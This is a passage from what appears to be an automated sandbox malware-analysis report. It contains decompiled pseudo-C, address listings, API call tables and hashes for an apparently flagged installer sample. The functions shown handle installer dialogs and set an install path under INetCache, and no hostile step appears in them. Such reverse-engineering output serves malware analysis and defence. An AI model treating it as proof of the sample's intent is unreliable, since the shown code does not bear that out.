                                                                                                                          						return 0 |  *0x42922c == 0x00000000;
                                                                                                                          					}
                                                                                                                          				} else {
                                                                                                                          					_t127 = _a4;
                                                                                                                          					_t136 = 0;
                                                                                                                          					if(_t130 == 0x47) {
                                                                                                                          						SetWindowPos( *0x423728, _t127, 0, 0, 0, 0, 0x13);
                                                                                                                          					}
                                                                                                                          					_t122 = _a12;
                                                                                                                          					if(_t130 != 5) {
                                                                                                                          						L8:
                                                                                                                          						if(_t130 != 0x40d) {
                                                                                                                          							__eflags = _t130 - 0x11;
                                                                                                                          							if(_t130 != 0x11) {
                                                                                                                          								__eflags = _t130 - 0x111;
                                                                                                                          								if(_t130 != 0x111) {
                                                                                                                          									goto L28;
                                                                                                                          								}
                                                                                                                          								_t135 = _t122 & 0x0000ffff;
                                                                                                                          								_t128 = GetDlgItem(_t127, _t135);
                                                                                                                          								__eflags = _t128 - _t136;
                                                                                                                          								if(_t128 == _t136) {
                                                                                                                          									L15:
                                                                                                                          									__eflags = _t135 - 1;
                                                                                                                          									if(_t135 != 1) {
                                                                                                                          										__eflags = _t135 - 3;
                                                                                                                          										if(_t135 != 3) {
                                                                                                                          											_t129 = 2;
                                                                                                                          											__eflags = _t135 - _t129;
                                                                                                                          											if(_t135 != _t129) {
                                                                                                                          												L27:
                                                                                                                          												SendMessageW( *0x429238, 0x111, _t122, _a16);
                                                                                                                          												goto L28;
                                                                                                                          											}
                                                                                                                          											__eflags =  *0x42a2ec - _t136;
                                                                                                                          											if( *0x42a2ec == _t136) {
                                                                                                                          												_t99 = E0040140B(3);
                                                                                                                          												__eflags = _t99;
                                                                                                                          												if(_t99 != 0) {
                                                                                                                          													goto L28;
                                                                                                                          												}
                                                                                                                          												 *0x421f18 = 1;
                                                                                                                          												L23:
                                                                                                                          												_push(0x78);
                                                                                                                          												L24:
                                                                                                                          												E0040459D();
                                                                                                                          												goto L28;
                                                                                                                          											}
                                                                                                                          											E0040140B(_t129);
                                                                                                                          											 *0x421f18 = _t129;
                                                                                                                          											goto L23;
                                                                                                                          										}
                                                                                                                          										__eflags =  *0x40a39c - _t136; // 0x2
                                                                                                                          										if(__eflags <= 0) {
                                                                                                                          											goto L27;
                                                                                                                          										}
                                                                                                                          										_push(0xffffffff);
                                                                                                                          										goto L24;
                                                                                                                          									}
                                                                                                                          									_push(_t135);
                                                                                                                          									goto L24;
                                                                                                                          								}
                                                                                                                          								SendMessageW(_t128, 0xf3, _t136, _t136);
                                                                                                                          								_t103 = IsWindowEnabled(_t128);
                                                                                                                          								__eflags = _t103;
                                                                                                                          								if(_t103 == 0) {
                                                                                                                          									L63:
                                                                                                                          									return 0;
                                                                                                                          								}
                                                                                                                          								goto L15;
                                                                                                                          							}
                                                                                                                          							SetWindowLongW(_t127, _t136, _t136);
                                                                                                                          							return 1;
                                                                                                                          						}
                                                                                                                          						DestroyWindow( *0x429238);
                                                                                                                          						 *0x429238 = _t122;
                                                                                                                          						L60:
                                                                                                                          						if( *0x425748 == _t136 &&  *0x429238 != _t136) {
                                                                                                                          							ShowWindow(_t127, 0xa); // executed
                                                                                                                          							 *0x425748 = 1;
                                                                                                                          						}
                                                                                                                          						goto L63;
                                                                                                                          					} else {
                                                                                                                          						asm("sbb eax, eax");
                                                                                                                          						ShowWindow( *0x423728,  ~(_t122 - 1) & 0x00000005);
                                                                                                                          						if(_t122 != 2 || (GetWindowLongW(_t127, 0xfffffff0) & 0x21010000) != 0x1000000) {
                                                                                                                          							L28:
                                                                                                                          							return E0040462B(_a8, _t122, _a16);
                                                                                                                          						} else {
                                                                                                                          							ShowWindow(_t127, 4);
                                                                                                                          							goto L8;
                                                                                                                          						}
                                                                                                                          					}
                                                                                                                          				}
                                                                                                                          			}































                                                                                                                          0x004040d0
                                                                                                                          0x004040d7
                                                                                                                          0x0040423e
                                                                                                                          0x00404242
                                                                                                                          0x00404246
                                                                                                                          0x00404248
                                                                                                                          0x0040424d
                                                                                                                          0x00404258
                                                                                                                          0x00404263
                                                                                                                          0x00404268
                                                                                                                          0x0040426a
                                                                                                                          0x0040426c
                                                                                                                          0x0040426f
                                                                                                                          0x00404274
                                                                                                                          0x00404282
                                                                                                                          0x0040428f
                                                                                                                          0x00404296
                                                                                                                          0x00404296
                                                                                                                          0x00404297
                                                                                                                          0x00404297
                                                                                                                          0x0040429c
                                                                                                                          0x004042a2
                                                                                                                          0x004042a9
                                                                                                                          0x004042af
                                                                                                                          0x004042b1
                                                                                                                          0x004042f1
                                                                                                                          0x004042f6
                                                                                                                          0x004042fb
                                                                                                                          0x004042fb
                                                                                                                          0x00404300
                                                                                                                          0x00404309
                                                                                                                          0x0040430b
                                                                                                                          0x00404310
                                                                                                                          0x00404316
                                                                                                                          0x0040431a
                                                                                                                          0x0040431a
                                                                                                                          0x0040431f
                                                                                                                          0x00404325
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00404330
                                                                                                                          0x00404336
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x0040433f
                                                                                                                          0x00404347
                                                                                                                          0x0040434c
                                                                                                                          0x0040434f
                                                                                                                          0x00404355
                                                                                                                          0x0040435a
                                                                                                                          0x0040435d
                                                                                                                          0x00404363
                                                                                                                          0x00404368
                                                                                                                          0x0040436b
                                                                                                                          0x00404371
                                                                                                                          0x00404379
                                                                                                                          0x0040437f
                                                                                                                          0x00404385
                                                                                                                          0x00404389
                                                                                                                          0x00404390
                                                                                                                          0x00404390
                                                                                                                          0x00404390
                                                                                                                          0x0040439a
                                                                                                                          0x004043ac
                                                                                                                          0x004043b8
                                                                                                                          0x004043bd
                                                                                                                          0x004043c7
                                                                                                                          0x004043cd
                                                                                                                          0x004043cf
                                                                                                                          0x004043d4
                                                                                                                          0x004043d1
                                                                                                                          0x004043d1
                                                                                                                          0x004043d1
                                                                                                                          0x004043e4
                                                                                                                          0x004043fc
                                                                                                                          0x004043fe
                                                                                                                          0x00404404
                                                                                                                          0x00404419
                                                                                                                          0x00404406
                                                                                                                          0x0040440f
                                                                                                                          0x00404411
                                                                                                                          0x00404411
                                                                                                                          0x0040441f
                                                                                                                          0x00404430
                                                                                                                          0x00404446
                                                                                                                          0x0040444d
                                                                                                                          0x00404457
                                                                                                                          0x0040445c
                                                                                                                          0x0040445e
                                                                                                                          0x00000000
                                                                                                                          0x00404464
                                                                                                                          0x00404464
                                                                                                                          0x00404466
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x0040446c
                                                                                                                          0x00404470
                                                                                                                          0x00404495
                                                                                                                          0x0040449b
                                                                                                                          0x004044a1
                                                                                                                          0x004044a3
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x004044c9
                                                                                                                          0x004044cf
                                                                                                                          0x004044d1
                                                                                                                          0x004044d6
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x004044dc
                                                                                                                          0x004044df
                                                                                                                          0x004044e2
                                                                                                                          0x004044f9
                                                                                                                          0x00404505
                                                                                                                          0x0040451e
                                                                                                                          0x00404528
                                                                                                                          0x0040452d
                                                                                                                          0x00404533
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x0040453d
                                                                                                                          0x00404548
                                                                                                                          0x00000000
                                                                                                                          0x00404548
                                                                                                                          0x00404472
                                                                                                                          0x00404478
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x0040447e
                                                                                                                          0x00404484
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x0040448a
                                                                                                                          0x0040445e
                                                                                                                          0x00404555
                                                                                                                          0x00404561
                                                                                                                          0x00404568
                                                                                                                          0x00000000
                                                                                                                          0x004042b3
                                                                                                                          0x004042b3
                                                                                                                          0x004042b6
                                                                                                                          0x004042e9
                                                                                                                          0x004042e9
                                                                                                                          0x004042eb
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x004042eb
                                                                                                                          0x004042bc
                                                                                                                          0x004042c1
                                                                                                                          0x004042c3
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x004042d3
                                                                                                                          0x004042db
                                                                                                                          0x00000000
                                                                                                                          0x004042e1
                                                                                                                          0x004040e9
                                                                                                                          0x004040e9
                                                                                                                          0x004040ed
                                                                                                                          0x004040f2
                                                                                                                          0x00404101
                                                                                                                          0x00404101
                                                                                                                          0x00404107
                                                                                                                          0x0040410e
                                                                                                                          0x00404152
                                                                                                                          0x00404158
                                                                                                                          0x00404171
                                                                                                                          0x00404174
                                                                                                                          0x00404187
                                                                                                                          0x0040418d
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00404193
                                                                                                                          0x0040419e
                                                                                                                          0x004041a0
                                                                                                                          0x004041a2
                                                                                                                          0x004041c1
                                                                                                                          0x004041c1
                                                                                                                          0x004041c4
                                                                                                                          0x004041c9
                                                                                                                          0x004041cc
                                                                                                                          0x004041dc
                                                                                                                          0x004041dd
                                                                                                                          0x004041df
                                                                                                                          0x00404215
                                                                                                                          0x00404225
                                                                                                                          0x00000000
                                                                                                                          0x00404225
                                                                                                                          0x004041e1
                                                                                                                          0x004041e7
                                                                                                                          0x00404200
                                                                                                                          0x00404205
                                                                                                                          0x00404207
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00404209
                                                                                                                          0x004041f5
                                                                                                                          0x004041f5
                                                                                                                          0x004041f7
                                                                                                                          0x004041f7
                                                                                                                          0x00000000
                                                                                                                          0x004041f7
                                                                                                                          0x004041ea
                                                                                                                          0x004041ef
                                                                                                                          0x00000000
                                                                                                                          0x004041ef
                                                                                                                          0x004041ce
                                                                                                                          0x004041d4
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x004041d6
                                                                                                                          0x00000000
                                                                                                                          0x004041d6
                                                                                                                          0x004041c6
                                                                                                                          0x00000000
                                                                                                                          0x004041c6
                                                                                                                          0x004041ac
                                                                                                                          0x004041b3
                                                                                                                          0x004041b9
                                                                                                                          0x004041bb
                                                                                                                          0x00404591
                                                                                                                          0x00000000
                                                                                                                          0x00404591
                                                                                                                          0x00000000
                                                                                                                          0x004041bb
                                                                                                                          0x00404179
                                                                                                                          0x00000000
                                                                                                                          0x00404181
                                                                                                                          0x00404160
                                                                                                                          0x00404166
                                                                                                                          0x0040456e
                                                                                                                          0x00404574
                                                                                                                          0x00404581
                                                                                                                          0x00404587
                                                                                                                          0x00404587
                                                                                                                          0x00000000
                                                                                                                          0x00404110
                                                                                                                          0x00404115
                                                                                                                          0x00404121
                                                                                                                          0x0040412a
                                                                                                                          0x0040422b
                                                                                                                          0x00000000
                                                                                                                          0x00404149
                                                                                                                          0x0040414c
                                                                                                                          0x00000000
                                                                                                                          0x0040414c
                                                                                                                          0x0040412a
                                                                                                                          0x0040410e

                                                                                                                          APIs
                                                                                                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00404101
                                                                                                                          • ShowWindow.USER32(?), ref: 00404121
                                                                                                                          • GetWindowLongW.USER32(?,000000F0), ref: 00404133
                                                                                                                          • ShowWindow.USER32(?,00000004), ref: 0040414C
                                                                                                                          • DestroyWindow.USER32 ref: 00404160
                                                                                                                          • SetWindowLongW.USER32(?,00000000,00000000), ref: 00404179
                                                                                                                          • GetDlgItem.USER32(?,?), ref: 00404198
                                                                                                                          • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 004041AC
                                                                                                                          • IsWindowEnabled.USER32(00000000), ref: 004041B3
                                                                                                                          • GetDlgItem.USER32(?,00000001), ref: 0040425E
                                                                                                                          • GetDlgItem.USER32(?,00000002), ref: 00404268
                                                                                                                          • SetClassLongW.USER32(?,000000F2,?), ref: 00404282
                                                                                                                          • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 004042D3
                                                                                                                          • GetDlgItem.USER32(?,00000003), ref: 00404379
                                                                                                                          • ShowWindow.USER32(00000000,?), ref: 0040439A
                                                                                                                          • KiUserCallbackDispatcher.NTDLL(?,?), ref: 004043AC
                                                                                                                          • EnableWindow.USER32(?,?), ref: 004043C7
                                                                                                                          • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 004043DD
                                                                                                                          • EnableMenuItem.USER32(00000000), ref: 004043E4
                                                                                                                          • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 004043FC
                                                                                                                          • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 0040440F
                                                                                                                          • lstrlenW.KERNEL32(00423748,?,00423748,00000000), ref: 00404439
                                                                                                                          • SetWindowTextW.USER32(?,00423748), ref: 0040444D
                                                                                                                          • ShowWindow.USER32(?,0000000A), ref: 00404581
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.33051309738.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000001.00000002.33051278337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051370538.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051404339.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051528806.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051549373.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051594740.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051637884.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Window$Item$MessageSendShow$Long$EnableMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                                                                          • String ID: H7B
                                                                                                                          • API String ID: 121052019-2300413410
                                                                                                                          • Opcode ID: 2f4dad2f818047668635e16f952da299a81014d83ff1599baf972819d0fbfd0c
                                                                                                                          • Instruction ID: 1d4a55fced449df2e2a9dfc159c1061f424388fbea236c5341ec002980a30b6c
                                                                                                                          • Opcode Fuzzy Hash: 2f4dad2f818047668635e16f952da299a81014d83ff1599baf972819d0fbfd0c
                                                                                                                          • Instruction Fuzzy Hash: C0C1C2B1600604FBDB216F61EE85E2A3B78EB85745F40097EF781B51F0CB3958529B2E
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 301 403d17-403d2f call 406a35 304 403d31-403d41 call 4065af 301->304 305 403d43-403d7a call 406536 301->305 312 403d9d-403dc6 call 403fed call 40603f 304->312 310 403d92-403d98 lstrcatW 305->310 311 403d7c-403d8d call 406536 305->311 310->312 311->310 319 403e58-403e60 call 40603f 312->319 320 403dcc-403dd1 312->320 326 403e62-403e69 call 4066a5 319->326 327 403e6e-403e93 LoadImageW 319->327 320->319 321 403dd7-403dff call 406536 320->321 321->319 328 403e01-403e05 321->328 326->327 330 403f14-403f1c call 40140b 327->330 331 403e95-403ec5 RegisterClassW 327->331 333 403e17-403e23 lstrlenW 328->333 334 403e07-403e14 call 405f64 328->334 343 403f26-403f31 call 403fed 330->343 344 403f1e-403f21 330->344 335 403fe3 331->335 336 403ecb-403f0f SystemParametersInfoW CreateWindowExW 331->336 340 403e25-403e33 lstrcmpiW 333->340 341 403e4b-403e53 call 405f37 call 406668 333->341 334->333 339 403fe5-403fec 335->339 336->330 340->341 342 403e35-403e3f GetFileAttributesW 340->342 341->319 347 403e41-403e43 342->347 348 403e45-403e46 call 405f83 342->348 354 403f37-403f51 ShowWindow call 4069c5 343->354 355 403fba-403fbb call 40579d 343->355 344->339 347->341 347->348 348->341 362 403f53-403f58 call 4069c5 354->362 363 403f5d-403f6f GetClassInfoW 354->363 358 403fc0-403fc2 355->358 360 403fc4-403fca 358->360 361 403fdc-403fde call 40140b 358->361 360->344 364 403fd0-403fd7 call 40140b 360->364 361->335 362->363 367 403f71-403f81 GetClassInfoW RegisterClassW 363->367 368 403f87-403faa DialogBoxParamW call 40140b 363->368 364->344 367->368 371 403faf-403fb8 call 403c67 368->371 371->339
                                                                                                                          C-Code - Quality: 96%
                                                                                                                          			E00403D17(void* __eflags) {
                                                                                                                          				intOrPtr _v4;
                                                                                                                          				intOrPtr _v8;
                                                                                                                          				int _v12;
                                                                                                                          				void _v16;
                                                                                                                          				void* __ebx;
                                                                                                                          				void* __edi;
                                                                                                                          				void* __esi;
                                                                                                                          				intOrPtr* _t22;
                                                                                                                          				void* _t30;
                                                                                                                          				void* _t32;
                                                                                                                          				int _t33;
                                                                                                                          				void* _t36;
                                                                                                                          				int _t39;
                                                                                                                          				int _t40;
                                                                                                                          				int _t44;
                                                                                                                          				short _t63;
                                                                                                                          				WCHAR* _t65;
                                                                                                                          				signed char _t69;
                                                                                                                          				WCHAR* _t76;
                                                                                                                          				intOrPtr _t82;
                                                                                                                          				WCHAR* _t87;
                                                                                                                          
                                                                                                                          				_t82 =  *0x42a270;
                                                                                                                          				_t22 = E00406A35(2);
                                                                                                                          				_t90 = _t22;
                                                                                                                          				if(_t22 == 0) {
                                                                                                                          					_t76 = 0x423748;
                                                                                                                          					L"1033" = 0x30;
                                                                                                                          					 *0x437002 = 0x78;
                                                                                                                          					 *0x437004 = 0;
                                                                                                                          					E00406536(_t78, __eflags, 0x80000001, L"Control Panel\\Desktop\\ResourceLocale", 0, 0x423748, 0);
                                                                                                                          					__eflags =  *0x423748;
                                                                                                                          					if(__eflags == 0) {
                                                                                                                          						E00406536(_t78, __eflags, 0x80000003, L".DEFAULT\\Control Panel\\International",  &M004083D4, 0x423748, 0);
                                                                                                                          					}
                                                                                                                          					lstrcatW(L"1033", _t76);
                                                                                                                          				} else {
                                                                                                                          					E004065AF(L"1033",  *_t22() & 0x0000ffff);
                                                                                                                          				}
                                                                                                                          				E00403FED(_t78, _t90);
                                                                                                                          				_t86 = L"C:\\Users\\Arthur\\AppData\\Local\\Microsoft\\Windows\\INetCache\\Psychopharmacology";
                                                                                                                          				 *0x42a2e0 =  *0x42a278 & 0x00000020;
                                                                                                                          				 *0x42a2fc = 0x10000;
                                                                                                                          				if(E0040603F(_t90, L"C:\\Users\\Arthur\\AppData\\Local\\Microsoft\\Windows\\INetCache\\Psychopharmacology") != 0) {
                                                                                                                          					L16:
                                                                                                                          					if(E0040603F(_t98, _t86) == 0) {
                                                                                                                          						E004066A5(_t76, 0, _t82, _t86,  *((intOrPtr*)(_t82 + 0x118))); // executed
                                                                                                                          					}
                                                                                                                          					_t30 = LoadImageW( *0x42a260, 0x67, 1, 0, 0, 0x8040); // executed
                                                                                                                          					 *0x429248 = _t30;
                                                                                                                          					if( *((intOrPtr*)(_t82 + 0x50)) == 0xffffffff) {
                                                                                                                          						L21:
                                                                                                                          						if(E0040140B(0) == 0) {
                                                                                                                          							_t32 = E00403FED(_t78, __eflags);
                                                                                                                          							__eflags =  *0x42a300;
                                                                                                                          							if( *0x42a300 != 0) {
                                                                                                                          								_t33 = E0040579D(_t32, 0);
                                                                                                                          								__eflags = _t33;
                                                                                                                          								if(_t33 == 0) {
                                                                                                                          									E0040140B(1);
                                                                                                                          									goto L33;
                                                                                                                          								}
                                                                                                                          								__eflags =  *0x42922c;
                                                                                                                          								if( *0x42922c == 0) {
                                                                                                                          									E0040140B(2);
                                                                                                                          								}
                                                                                                                          								goto L22;
                                                                                                                          							}
                                                                                                                          							ShowWindow( *0x423728, 5); // executed
                                                                                                                          							_t39 = E004069C5("RichEd20"); // executed
                                                                                                                          							__eflags = _t39;
                                                                                                                          							if(_t39 == 0) {
                                                                                                                          								E004069C5("RichEd32");
                                                                                                                          							}
                                                                                                                          							_t87 = L"RichEdit20W";
                                                                                                                          							_t40 = GetClassInfoW(0, _t87, 0x429200);
                                                                                                                          							__eflags = _t40;
                                                                                                                          							if(_t40 == 0) {
                                                                                                                          								GetClassInfoW(0, L"RichEdit", 0x429200);
                                                                                                                          								 *0x429224 = _t87;
                                                                                                                          								RegisterClassW(0x429200);
                                                                                                                          							}
                                                                                                                          							_t44 = DialogBoxParamW( *0x42a260,  *0x429240 + 0x00000069 & 0x0000ffff, 0, E004040C5, 0); // executed
                                                                                                                          							E00403C67(E0040140B(5), 1);
                                                                                                                          							return _t44;
                                                                                                                          						}
                                                                                                                          						L22:
                                                                                                                          						_t36 = 2;
                                                                                                                          						return _t36;
                                                                                                                          					} else {
                                                                                                                          						_t78 =  *0x42a260;
                                                                                                                          						 *0x429204 = E00401000;
                                                                                                                          						 *0x429210 =  *0x42a260;
                                                                                                                          						 *0x429214 = _t30;
                                                                                                                          						 *0x429224 = 0x40a3b4;
                                                                                                                          						if(RegisterClassW(0x429200) == 0) {
                                                                                                                          							L33:
                                                                                                                          							__eflags = 0;
                                                                                                                          							return 0;
                                                                                                                          						}
                                                                                                                          						SystemParametersInfoW(0x30, 0,  &_v16, 0);
                                                                                                                          						 *0x423728 = CreateWindowExW(0x80, 0x40a3b4, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x42a260, 0);
                                                                                                                          						goto L21;
                                                                                                                          					}
                                                                                                                          				} else {
                                                                                                                          					_t78 =  *(_t82 + 0x48);
                                                                                                                          					_t92 = _t78;
                                                                                                                          					if(_t78 == 0) {
                                                                                                                          						goto L16;
                                                                                                                          					}
                                                                                                                          					_t76 = 0x428200;
                                                                                                                          					E00406536(_t78, _t92,  *((intOrPtr*)(_t82 + 0x44)),  *0x42a298 + _t78 * 2,  *0x42a298 +  *(_t82 + 0x4c) * 2, 0x428200, 0);
                                                                                                                          					_t63 =  *0x428200; // 0x43
                                                                                                                          					if(_t63 == 0) {
                                                                                                                          						goto L16;
                                                                                                                          					}
                                                                                                                          					if(_t63 == 0x22) {
                                                                                                                          						_t76 = 0x428202;
                                                                                                                          						 *((short*)(E00405F64(0x428202, 0x22))) = 0;
                                                                                                                          					}
                                                                                                                          					_t65 = _t76 + lstrlenW(_t76) * 2 - 8;
                                                                                                                          					if(_t65 <= _t76 || lstrcmpiW(_t65, L".exe") != 0) {
                                                                                                                          						L15:
                                                                                                                          						E00406668(_t86, E00405F37(_t76));
                                                                                                                          						goto L16;
                                                                                                                          					} else {
                                                                                                                          						_t69 = GetFileAttributesW(_t76);
                                                                                                                          						if(_t69 == 0xffffffff) {
                                                                                                                          							L14:
                                                                                                                          							E00405F83(_t76);
                                                                                                                          							goto L15;
                                                                                                                          						}
                                                                                                                          						_t98 = _t69 & 0x00000010;
                                                                                                                          						if((_t69 & 0x00000010) != 0) {
                                                                                                                          							goto L15;
                                                                                                                          						}
                                                                                                                          						goto L14;
                                                                                                                          					}
                                                                                                                          				}
                                                                                                                          			}
























                                                                                                                          0x00403d1d
                                                                                                                          0x00403d26
                                                                                                                          0x00403d2d
                                                                                                                          0x00403d2f
                                                                                                                          0x00403d43
                                                                                                                          0x00403d55
                                                                                                                          0x00403d5e
                                                                                                                          0x00403d67
                                                                                                                          0x00403d6e
                                                                                                                          0x00403d73
                                                                                                                          0x00403d7a
                                                                                                                          0x00403d8d
                                                                                                                          0x00403d8d
                                                                                                                          0x00403d98
                                                                                                                          0x00403d31
                                                                                                                          0x00403d3c
                                                                                                                          0x00403d3c
                                                                                                                          0x00403d9d
                                                                                                                          0x00403da7
                                                                                                                          0x00403db0
                                                                                                                          0x00403db5
                                                                                                                          0x00403dc6
                                                                                                                          0x00403e58
                                                                                                                          0x00403e60
                                                                                                                          0x00403e69
                                                                                                                          0x00403e69
                                                                                                                          0x00403e7f
                                                                                                                          0x00403e85
                                                                                                                          0x00403e93
                                                                                                                          0x00403f14
                                                                                                                          0x00403f1c
                                                                                                                          0x00403f26
                                                                                                                          0x00403f2b
                                                                                                                          0x00403f31
                                                                                                                          0x00403fbb
                                                                                                                          0x00403fc0
                                                                                                                          0x00403fc2
                                                                                                                          0x00403fde
                                                                                                                          0x00000000
                                                                                                                          0x00403fde
                                                                                                                          0x00403fc4
                                                                                                                          0x00403fca
                                                                                                                          0x00403fd2
                                                                                                                          0x00403fd2
                                                                                                                          0x00000000
                                                                                                                          0x00403fca
                                                                                                                          0x00403f3f
                                                                                                                          0x00403f4a
                                                                                                                          0x00403f4f
                                                                                                                          0x00403f51
                                                                                                                          0x00403f58
                                                                                                                          0x00403f58
                                                                                                                          0x00403f63
                                                                                                                          0x00403f6b
                                                                                                                          0x00403f6d
                                                                                                                          0x00403f6f
                                                                                                                          0x00403f78
                                                                                                                          0x00403f7b
                                                                                                                          0x00403f81
                                                                                                                          0x00403f81
                                                                                                                          0x00403fa0
                                                                                                                          0x00403fb1
                                                                                                                          0x00000000
                                                                                                                          0x00403fb6
                                                                                                                          0x00403f1e
                                                                                                                          0x00403f20
                                                                                                                          0x00000000
                                                                                                                          0x00403e95
                                                                                                                          0x00403e95
                                                                                                                          0x00403ea1
                                                                                                                          0x00403eab
                                                                                                                          0x00403eb1
                                                                                                                          0x00403eb6
                                                                                                                          0x00403ec5
                                                                                                                          0x00403fe3
                                                                                                                          0x00403fe3
                                                                                                                          0x00000000
                                                                                                                          0x00403fe3
                                                                                                                          0x00403ed4
                                                                                                                          0x00403f0f
                                                                                                                          0x00000000
                                                                                                                          0x00403f0f
                                                                                                                          0x00403dcc
                                                                                                                          0x00403dcc
                                                                                                                          0x00403dcf
                                                                                                                          0x00403dd1
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00403ddf
                                                                                                                          0x00403df1
                                                                                                                          0x00403df6
                                                                                                                          0x00403dff
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00403e05
                                                                                                                          0x00403e07
                                                                                                                          0x00403e14
                                                                                                                          0x00403e14
                                                                                                                          0x00403e1d
                                                                                                                          0x00403e23
                                                                                                                          0x00403e4b
                                                                                                                          0x00403e53
                                                                                                                          0x00000000
                                                                                                                          0x00403e35
                                                                                                                          0x00403e36
                                                                                                                          0x00403e3f
                                                                                                                          0x00403e45
                                                                                                                          0x00403e46
                                                                                                                          0x00000000
                                                                                                                          0x00403e46
                                                                                                                          0x00403e41
                                                                                                                          0x00403e43
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00403e43
                                                                                                                          0x00403e23

                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00406A35: GetModuleHandleA.KERNEL32(?,00000020,?,00403750,0000000B), ref: 00406A47
                                                                                                                            • Part of subcall function 00406A35: GetProcAddress.KERNEL32(00000000,?), ref: 00406A62
                                                                                                                          • lstrcatW.KERNEL32(1033,00423748), ref: 00403D98
                                                                                                                          • lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Psychopharmacology,1033,00423748,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423748,00000000,00000002,75AA3420), ref: 00403E18
                                                                                                                          • lstrcmpiW.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Psychopharmacology,1033,00423748,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423748,00000000), ref: 00403E2B
                                                                                                                          • GetFileAttributesW.KERNEL32(Call,?,00000000,?), ref: 00403E36
                                                                                                                          • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Psychopharmacology), ref: 00403E7F
                                                                                                                            • Part of subcall function 004065AF: wsprintfW.USER32 ref: 004065BC
                                                                                                                          • RegisterClassW.USER32(00429200), ref: 00403EBC
                                                                                                                          • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403ED4
                                                                                                                          • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403F09
                                                                                                                          • ShowWindow.USER32(00000005,00000000,?,00000000,?), ref: 00403F3F
                                                                                                                          • GetClassInfoW.USER32(00000000,RichEdit20W,00429200), ref: 00403F6B
                                                                                                                          • GetClassInfoW.USER32(00000000,RichEdit,00429200), ref: 00403F78
                                                                                                                          • RegisterClassW.USER32(00429200), ref: 00403F81
                                                                                                                          • DialogBoxParamW.USER32(?,00000000,004040C5,00000000), ref: 00403FA0
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.33051309738.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000001.00000002.33051278337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051370538.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051404339.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051528806.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051549373.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051594740.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051637884.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
